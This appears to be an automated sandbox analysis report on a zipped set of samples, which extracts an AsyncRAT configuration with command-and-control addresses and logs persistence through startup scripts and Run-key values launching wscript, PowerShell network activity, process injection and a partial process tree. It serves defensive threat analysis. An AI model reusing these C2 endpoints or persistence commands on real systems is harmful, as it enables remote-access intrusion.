Analysis
-
max time kernel
296s -
max time network
304s -
platform
windows10-1703_x64 -
resource
win10-20230915-en -
resource tags
arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system -
submitted
27-09-2023 14:58
Static task
static1
General
-
Target
New Compressed (zipped) Folder.zip
-
Size
7.0MB
-
MD5
3fd66dc82138d1427d43e70b36b4cd3a
-
SHA1
39fe86fbba36a06220c96f72f7aed0f2e0bd168d
-
SHA256
7549d4a121e1e7b5dc056cebe025d1af3d8c03440cad9bb23697c3f9bc6d07a9
-
SHA512
d036d2423eb28ea48f0a9d410c357b79f99371b8730dd19a38c8277b76b4f442762044e15efa361d4185d0648478b34b4f4957ba72aba6df71a334d033bc2253
-
SSDEEP
196608:wB83eQOA1B47Y0Az9MORof8EYFtDh+u1GBSDqRuJrHlU3s8YuW:MrQfqLABBBF7N17qRyHlEs8YuW
Malware Config
Extracted
asyncrat
| Edit 3LOSH RAT
MAC
74.208.105.80:7777
74.208.105.80:2005
mtest.loseyourip.com:7777
mtest.loseyourip.com:2005
AsyncMutex_3losh
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/memory/336-188-0x0000000000400000-0x0000000000416000-memory.dmp asyncrat -
Blocklisted process makes network request 18 IoCs
flow pid Process 49 3776 powershell.exe 51 3776 powershell.exe 53 3776 powershell.exe 57 360 wscript.exe 59 2456 wscript.exe 60 3156 wscript.exe 61 2456 wscript.exe 62 360 wscript.exe 63 3156 wscript.exe 64 2456 wscript.exe 65 360 wscript.exe 66 3156 wscript.exe 67 2456 wscript.exe 69 360 wscript.exe 70 3156 wscript.exe 72 2456 wscript.exe 73 360 wscript.exe 74 3156 wscript.exe -
Drops startup file 5 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c98083c89ba696fdc10a9528722e8673f70b0b1872b52fbda472a38d4cfbf350.js WScript.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OfYaEGuGdY.js wscript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OfYaEGuGdY.js wscript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c98083c89ba696fdc10a9528722e8673f70b0b1872b52fbda472a38d4cfbf350.js wscript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OfYaEGuGdY.js wscript.exe -
Executes dropped EXE 1 IoCs
pid Process 864 MSIA13B.tmp -
Loads dropped DLL 5 IoCs
pid Process 3876 MsiExec.exe 3876 MsiExec.exe 3876 MsiExec.exe 3876 MsiExec.exe 3876 MsiExec.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000\Software\Microsoft\Windows\CurrentVersion\Run\c98083c89ba696fdc10a9528722e8673f70b0b1872b52fbda472a38d4cfbf350 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\c98083c89ba696fdc10a9528722e8673f70b0b1872b52fbda472a38d4cfbf350.js\"" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c98083c89ba696fdc10a9528722e8673f70b0b1872b52fbda472a38d4cfbf350 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\c98083c89ba696fdc10a9528722e8673f70b0b1872b52fbda472a38d4cfbf350.js\"" wscript.exe Set value (str) \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000\Software\Microsoft\Windows\CurrentVersion\Run\c98083c89ba696fdc10a9528722e8673f70b0b1872b52fbda472a38d4cfbf350 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\c98083c89ba696fdc10a9528722e8673f70b0b1872b52fbda472a38d4cfbf350.js\"" WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c98083c89ba696fdc10a9528722e8673f70b0b1872b52fbda472a38d4cfbf350 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\c98083c89ba696fdc10a9528722e8673f70b0b1872b52fbda472a38d4cfbf350.js\"" WScript.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\M: msiexec.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2432 set thread context of 336 2432 powershell.exe 108 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files (x86)\TechlineConnect\jre\lib\security\cacerts Global B seed calculator.exe -
Drops file in Windows directory 13 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI9E2A.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI9FF0.tmp msiexec.exe File created C:\Windows\Installer\e5a9972.msi msiexec.exe File opened for modification C:\Windows\Installer\e5a9972.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI9C14.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{F345E384-B24F-4B23-A9A8-CF9B1BB5EFAE} msiexec.exe File opened for modification C:\Windows\Installer\MSIA13B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9A0F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9B48.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9CF0.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
pid pid_target Process procid_target 348 208 WerFault.exe 77 3160 208 WerFault.exe 77 792 192 WerFault.exe 76 2828 2820 WerFault.exe 109 1148 2188 WerFault.exe 112 656 2124 WerFault.exe 113 -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3312 timeout.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 2944 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4392 systeminfo.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings OpenWith.exe -
Suspicious behavior: EnumeratesProcesses 39 IoCs
pid Process 192 4c09176981ccb4d6f7c48c6c88d4aad6ec13d5ad9b8afe41cdb40c749933f6b0.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 2432 powershell.exe 2432 powershell.exe 2432 powershell.exe 336 RegSvcs.exe 336 RegSvcs.exe 336 RegSvcs.exe 336 RegSvcs.exe 336 RegSvcs.exe 336 RegSvcs.exe 336 RegSvcs.exe 336 RegSvcs.exe 336 RegSvcs.exe 336 RegSvcs.exe 956 msiexec.exe 956 msiexec.exe 3776 powershell.exe 3776 powershell.exe 3776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2944 tasklist.exe Token: SeDebugPrivilege 2432 powershell.exe Token: SeDebugPrivilege 336 RegSvcs.exe Token: SeShutdownPrivilege 516 msiexec.exe Token: SeIncreaseQuotaPrivilege 516 msiexec.exe Token: SeSecurityPrivilege 956 msiexec.exe Token: SeCreateTokenPrivilege 516 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 516 msiexec.exe Token: SeLockMemoryPrivilege 516 msiexec.exe Token: SeIncreaseQuotaPrivilege 516 msiexec.exe Token: SeMachineAccountPrivilege 516 msiexec.exe Token: SeTcbPrivilege 516 msiexec.exe Token: SeSecurityPrivilege 516 msiexec.exe Token: SeTakeOwnershipPrivilege 516 msiexec.exe Token: SeLoadDriverPrivilege 516 msiexec.exe Token: SeSystemProfilePrivilege 516 msiexec.exe Token: SeSystemtimePrivilege 516 msiexec.exe Token: SeProfSingleProcessPrivilege 516 msiexec.exe Token: SeIncBasePriorityPrivilege 516 msiexec.exe Token: SeCreatePagefilePrivilege 516 msiexec.exe Token: SeCreatePermanentPrivilege 516 msiexec.exe Token: SeBackupPrivilege 516 msiexec.exe Token: SeRestorePrivilege 516 msiexec.exe Token: SeShutdownPrivilege 516 msiexec.exe Token: SeDebugPrivilege 516 msiexec.exe Token: SeAuditPrivilege 516 msiexec.exe Token: SeSystemEnvironmentPrivilege 516 msiexec.exe Token: SeChangeNotifyPrivilege 516 msiexec.exe Token: SeRemoteShutdownPrivilege 516 msiexec.exe Token: SeUndockPrivilege 516 msiexec.exe Token: SeSyncAgentPrivilege 516 msiexec.exe Token: SeEnableDelegationPrivilege 516 msiexec.exe Token: SeManageVolumePrivilege 516 msiexec.exe Token: SeImpersonatePrivilege 516 msiexec.exe Token: SeCreateGlobalPrivilege 516 msiexec.exe Token: SeRestorePrivilege 956 msiexec.exe Token: SeTakeOwnershipPrivilege 956 msiexec.exe Token: SeRestorePrivilege 956 msiexec.exe Token: SeTakeOwnershipPrivilege 956 msiexec.exe Token: SeRestorePrivilege 956 msiexec.exe Token: SeTakeOwnershipPrivilege 956 msiexec.exe Token: SeRestorePrivilege 956 msiexec.exe Token: SeTakeOwnershipPrivilege 956 msiexec.exe Token: SeRestorePrivilege 956 msiexec.exe Token: SeTakeOwnershipPrivilege 956 msiexec.exe Token: SeRestorePrivilege 956 msiexec.exe Token: SeTakeOwnershipPrivilege 956 msiexec.exe Token: SeRestorePrivilege 956 msiexec.exe Token: SeTakeOwnershipPrivilege 956 msiexec.exe Token: SeRestorePrivilege 956 msiexec.exe Token: SeTakeOwnershipPrivilege 956 msiexec.exe Token: SeRestorePrivilege 956 msiexec.exe Token: SeTakeOwnershipPrivilege 956 msiexec.exe Token: SeRestorePrivilege 956 msiexec.exe Token: SeTakeOwnershipPrivilege 956 msiexec.exe Token: SeRestorePrivilege 956 msiexec.exe Token: SeTakeOwnershipPrivilege 956 msiexec.exe Token: SeDebugPrivilege 3776 powershell.exe Token: SeShutdownPrivilege 1512 msiexec.exe Token: SeIncreaseQuotaPrivilege 1512 msiexec.exe Token: SeCreateTokenPrivilege 1512 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1512 msiexec.exe Token: SeLockMemoryPrivilege 1512 msiexec.exe Token: SeIncreaseQuotaPrivilege 1512 msiexec.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 4496 AcroRd32.exe 516 msiexec.exe 516 msiexec.exe -
Suspicious use of SetWindowsHookEx 23 IoCs
pid Process 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 336 RegSvcs.exe 4880 AcroRd32.exe 4496 AcroRd32.exe 4496 AcroRd32.exe 2760 Global B seed calculator.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4496 wrote to memory of 2104 4496 AcroRd32.exe 82 PID 4496 wrote to memory of 2104 4496 AcroRd32.exe 82 PID 4496 wrote to memory of 2104 4496 AcroRd32.exe 82 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 4164 2104 RdrCEF.exe 83 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84 PID 2104 wrote to memory of 2176 2104 RdrCEF.exe 84
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\New Compressed (zipped) Folder.zip"1⤵PID:3048
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2996
-
C:\Users\Admin\Desktop\New Compressed (zipped) Folder\38e2e621598702cd37731440444d631ab9d799c6876765dbd418403033b94bf0.exe"C:\Users\Admin\Desktop\New Compressed (zipped) Folder\38e2e621598702cd37731440444d631ab9d799c6876765dbd418403033b94bf0.exe"1⤵PID:4288
-
C:\Users\Admin\Desktop\New Compressed (zipped) Folder\4c09176981ccb4d6f7c48c6c88d4aad6ec13d5ad9b8afe41cdb40c749933f6b0.exe"C:\Users\Admin\Desktop\New Compressed (zipped) Folder\4c09176981ccb4d6f7c48c6c88d4aad6ec13d5ad9b8afe41cdb40c749933f6b0.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
PID:192 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 10922⤵
- Program crash
PID:792
-
-
C:\Users\Admin\Desktop\New Compressed (zipped) Folder\5c72bdbde9604fe063ee6f9ff6dcb0ff0e67a85dea42ea9b6e1eca544fe95005.exe"C:\Users\Admin\Desktop\New Compressed (zipped) Folder\5c72bdbde9604fe063ee6f9ff6dcb0ff0e67a85dea42ea9b6e1eca544fe95005.exe"1⤵PID:208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 2162⤵
- Program crash
PID:348
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 2162⤵
- Program crash
PID:3160
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Desktop\New Compressed (zipped) Folder\843c4407865ab4d809f0e3b8a581bab50a330ad98c926d0f10540f451b6611d5.pdf"1⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140432⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6210EC143BCC0533419EC6C000573764 --mojo-platform-channel-handle=1624 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵PID:4164
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=00F6226473763E3962200D2B24976183 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=00F6226473763E3962200D2B24976183 --renderer-client-id=2 --mojo-platform-channel-handle=1640 --allow-no-sandbox-job /prefetch:13⤵PID:2176
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=880784B7701EC4DC9528DAB0232B0861 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=880784B7701EC4DC9528DAB0232B0861 --renderer-client-id=4 --mojo-platform-channel-handle=2200 --allow-no-sandbox-job /prefetch:13⤵PID:692
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=66F174D9DCB49C15870C865DFE239064 --mojo-platform-channel-handle=2600 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵PID:2340
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DACD06FE2C6FBF517BBB2FCD9E6413C6 --mojo-platform-channel-handle=1680 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵PID:4036
-
-
